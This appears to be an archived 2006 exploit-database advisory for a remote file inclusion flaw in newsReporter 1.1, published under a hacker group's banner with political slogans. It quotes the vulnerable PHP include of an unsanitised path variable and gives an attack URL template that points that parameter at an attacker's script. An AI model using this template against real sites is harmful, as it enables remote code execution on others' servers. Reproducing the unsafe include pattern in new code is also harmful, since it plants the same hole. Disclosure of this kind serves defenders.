[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : newsReporter <= 1.1 (index.php) Remote Inclusion Vulnerability
# Published : 2006-08-01
# Author : Kurdish Security
# Previous Title : PHPAuction 2.1 (phpAds_path) Remote File Inclusion Vulnerability
# Next Title : Voodoo chat <= 1.0RC1b (file_path) Remote File Inclusion Vulnerability
>>> Kurdish Security
>>> newsReporter v1.1 Remote Command Execution
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
>>> Rish : High
>>> Class : Remote
>>> Script : newsReporter
>>> Site : http://www.knusperleicht.at
Code :
// removed the old code because it was not correct. /str0ke
// INCLUDE PATH
@define(NEWS_INCLUDE_PATH, $news_include_path);
// INCLUDE PATH
//Dateien importieren
include NEWS_INCLUDE_PATH."inc/config.inc.php";
Vulnerability :
http://www.site.com/[scriptpath]/index.php?news_include_path=[script]
# www.Syue.com [2006-08-01]